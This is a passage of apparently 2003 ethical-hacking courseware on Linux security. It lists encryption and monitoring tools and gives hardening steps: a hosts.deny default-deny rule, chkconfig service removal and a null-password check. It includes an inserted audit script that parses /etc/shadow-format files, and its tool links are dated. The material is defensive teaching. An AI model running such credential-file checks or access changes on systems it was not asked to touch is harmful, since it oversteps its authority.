  • Stunnel (http://www.stunnel.org)

    Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer) available on both UNIX and Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP, IMAP, NNTP, LDAP, etc) by having Stunnel provide the encryption, requiring no changes to daemon's code.

  • OpenSSH /SSH (http://www.openssh.com/)

    SSH (Secure Shell) is a program for logging into a remote machine and for executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network.

  • GnuPG (http://www.gnupg.org)

    GnuPG is a complete and free replacement for PGP. Since it does not use the patented IDEA algorithm, it can be used without any restrictions.
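The Stunnel entry above describes wrapping a non-SSL daemon without touching its code. The configuration below is an added example, not taken from the courseware or from the Stunnel project documentation; it assumes the stunnel 4.x ini-style configuration file (older stunnel 3 releases took the same settings as command-line options) and uses placeholder paths. It exposes a plaintext POP3 daemon listening on 127.0.0.1:110 as POP3-over-SSL on port 995, so the cleartext hop never leaves the loopback interface:

```ini
; Added example stunnel.conf (stunnel 4.x format assumed); paths are placeholders.
; Global options: the server certificate and key, and the unprivileged
; identity stunnel drops to after binding port 995.
cert   = /etc/stunnel/stunnel.pem
setuid = nobody
setgid = nogroup

; One service section per wrapped daemon.
; accept  = port stunnel listens on for SSL clients
; connect = where the unencrypted traffic is forwarded (loopback only)
[pop3s]
accept  = 995
connect = 127.0.0.1:110
```

The daemon on port 110 should be bound to 127.0.0.1 only (or blocked at the firewall), otherwise clients can still reach it in cleartext and the SSL wrapper adds nothing.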

    start sidebar
    Linux Tools: Log and Traffic Monitors
    • MRTG (http://www.mrtg.org)

      The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links.

    • Swatch (http://www.stanford.edu/~atkins/swatch/)

      Swatch, the simple watch daemon, is a program for monitoring Unix system logs.

    • Timbersee (http://www.fastcoder.net/~thumper/software/sysadmin/timbersee/)

      Timbersee is a program very similar to the Swatch program.

    • Logsurf (http://www.cert.dfn.de/eng/logsurf/)

      The Logsurfer program was designed to monitor any text-based log files on the system in real time.

    • TCP Wrappers (ftp://ftp.prcupine.org/pub/security/index.html)

      Wietse Venema's network logger, also known as TCPD or LOG_TCP. These programs log the client hostname of incoming telnet, ftp, rsh, rlogin, finger, etc. requests.

    end sidebar
     
  • MRTG (http://www.mrtg.org)

    The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links.

  • Swatch (http://www.stanford.edu/~atkins/swatch/)

    Swatch, the simple watch daemon, is a program for monitoring UNIX system logs.

  • Timbersee (http://www.fastcoder.net/~thumper/software/sysadmin/timbersee/)

    Timbersee is a program very similar to the Swatch program.

  • Logsurf (http://www.cert.dfn.de/eng/logsurf/)

    The Logsurfer program was designed to monitor any text-based log files on the system in real time.

  • TCP Wrappers (ftp://ftp.prcupine.org/pub/security/index.html)

    Wietse Venema's network logger, also known as TCPD or LOG_TCP. These programs log the client hostname of incoming telnet, ftp, rsh, rlogin, finger, etc. requests.

    start sidebar
    Linux Tools: Log and Traffic Monitors
    • IPLog (http://ojnk.sourceforge.net/)

      iplog is a TCP/IP traffic logger. Currently, it is capable of logging TCP, UDP and ICMP traffic.

    • IPTraf (http://cebu.mozcom.com/riker/iptraf/)

      IPTraf is an ncurses based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors and others.

    • Ntop (http://www.ntop.org)

      ntop is a Unix/Linux tool that shows the network usage, similar to what the popular "top" Unix/Linux command does.

    end sidebar
     
  • IPLog (http://ojnk.sourceforge.net/)

    iplog is a TCP/IP traffic logger. Currently, it is capable of logging TCP, UDP and ICMP traffic.

  • IPTraf (http://cebu.mozcom.com/riker/iptraf/)

    IPTraf is an ncurses based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors and others.

  • Ntop (http://www.ntop.org)

    ntop is a Unix/Linux tool that shows the network usage, similar to what the popular "top" Unix/Linux command does.

start sidebar
Linux Security Countermeasures

Physical Security:

Lock your computer physically in a secure place.

Password Security:

Do not assign easy-to-guess passwords.

Do not share your account with other people.

Check for user accounts with a null password (an empty password field) in /etc/shadow.

Network Security:

Close the door first by denying access from network by default.

# echo "ALL: ALL" >> /etc/hosts.deny

Stop all unused services such as sendmail, NFS.

$ chkconfig --list

$ chkconfig --del sendmail

$ chkconfig --del nfslock

$ chkconfig --del rpc

Check system logs in /var/log regularly especially /var/log/secure.

Update your Linux system regularly.

Check the errata (bug fixes) at

http://www.redhat.com/support/errata

The update packages can be found in ftp://updates.redhat.com

end sidebar
 
Countermeasures  

  • Physical Security

    • It is ideal to restrict physical access to the computer system so that unauthorized people don't get to misuse the system.

  • Password Security

    • Assign hard-to-guess passwords that are long enough.

    • Ensure procedural discipline so that passwords are kept private.

    • Ensure that the system does not accept null passwords or default passwords.

  • Network Security

    • Ensure all default network accesses are denied

      # echo "ALL: ALL" >> /etc/hosts.deny

    • Ensure that only essential services are running. Stop unused services like sendmail, NFS, etc.

      $ chkconfig --list

      $ chkconfig --del sendmail

      $ chkconfig --del nfslock

      $ chkconfig --del rpc

    • Verify system logs at regular intervals for suspicious activity (system logs are in /var/log; check /var/log/secure in particular).

  • Patch the Linux system and keep it up to date

    • Check for bug fixes at the vendor site

    • Update packages from the vendor's update site as they become available.
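The three checks in the list above (accounts with a null password in /etc/shadow, the default-deny rule in /etc/hosts.deny, and the services switched on in chkconfig) as a single audit script. This is an added example and not part of the courseware; the function names are ours, and it runs against constructed sample files written to a temporary directory rather than the live /etc files, so it needs no root to try out. Point the SAMPLE_* variables at /etc/shadow, /etc/hosts.deny and saved `chkconfig --list` output to audit a real host.

```shell
#!/bin/sh
# Added example (not from the courseware): audit helpers for the password,
# hosts.deny and chkconfig countermeasures, exercised on constructed samples.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed /etc/shadow excerpt: "guest" has an empty password field,
# "daemon" and "svc" are locked (* / !!), root has a hash.
SAMPLE_SHADOW="$WORK/shadow"
cat > "$SAMPLE_SHADOW" <<'EOF'
root:$1$abcdefgh$ijklmnopqrstuvwxyz012:12345:0:99999:7:::
guest::12345:0:99999:7:::
daemon:*:12345:0:99999:7:::
svc:!!:12345:0:99999:7:::
EOF

# Constructed /etc/hosts.deny that has not yet been closed by default.
SAMPLE_HOSTS_DENY="$WORK/hosts.deny"
printf '# hosts.deny\n' > "$SAMPLE_HOSTS_DENY"

# Constructed `chkconfig --list` output in Red Hat format.
SAMPLE_CHKCONFIG="$WORK/chkconfig.txt"
cat > "$SAMPLE_CHKCONFIG" <<'EOF'
sendmail        0:off   1:off   2:on    3:on    4:on    5:on    6:off
nfslock         0:off   1:off   2:off   3:off   4:off   5:off   6:off
sshd            0:off   1:off   2:on    3:on    4:on    5:on    6:off
EOF

# Print accounts whose shadow password field is empty: such accounts can be
# logged into with no password at all. Locked accounts (* or !!) are skipped.
null_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Exit 0 when the file already has an uncommented "ALL: ALL" line.
hosts_deny_is_closed() {
    grep -Eq '^[[:space:]]*ALL[[:space:]]*:[[:space:]]*ALL[[:space:]]*$' "$1"
}

# Append the default-deny rule exactly once. Note echo, not cat: a
# `cat "ALL:ALL"` would try to read a file named ALL:ALL instead.
close_hosts_deny() {
    hosts_deny_is_closed "$1" || echo "ALL: ALL" >> "$1"
}

# Names of services switched on in any runlevel, one per line.
enabled_services() {
    awk '/:on/ { print $1 }' "$1"
}

echo "Accounts with null passwords:"
null_password_accounts "$SAMPLE_SHADOW"
close_hosts_deny "$SAMPLE_HOSTS_DENY"
echo "hosts.deny default-deny present: $(hosts_deny_is_closed "$SAMPLE_HOSTS_DENY" && echo yes || echo no)"
echo "Services enabled in some runlevel (review each against what the host must offer):"
enabled_services "$SAMPLE_CHKCONFIG"
```

On the sample data the script reports guest as the null-password account, adds the ALL: ALL rule, and lists sendmail and sshd as enabled; nfslock, being off in every runlevel, is not listed. Running close_hosts_deny twice leaves a single rule, so it is safe to put in a periodic job.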

start sidebar
Summary
  • Linux is gaining popularity and is fast becoming a stable industry strength OS.

  • Once the IP address of a target system is known, an attacker can begin port scanning, looking for holes in the system for gaining access. Nmap is a popular tool for this.

  • Password cracking tools are available for Linux as well.

  • Sniffers as well as packet assembly/analyzing tools for Linux give attackers the same edge they have when dealing with other OSs.

  • Attackers with root privileges can engage in session hijacking as well.

  • Trojans, backdoors, worms are also prevalent in the Linux environment.

  • As with any other system, a well-developed, integrated procedure is to be put in place to counter the threats that exist.

end sidebar
 



Staff of EC-Council - Ethical Hacking Student Courseware. Certified Ethical Hacker-Exam 312-50 (EC-Council E-Business Certification Series)
Year: 2003
Pages: 109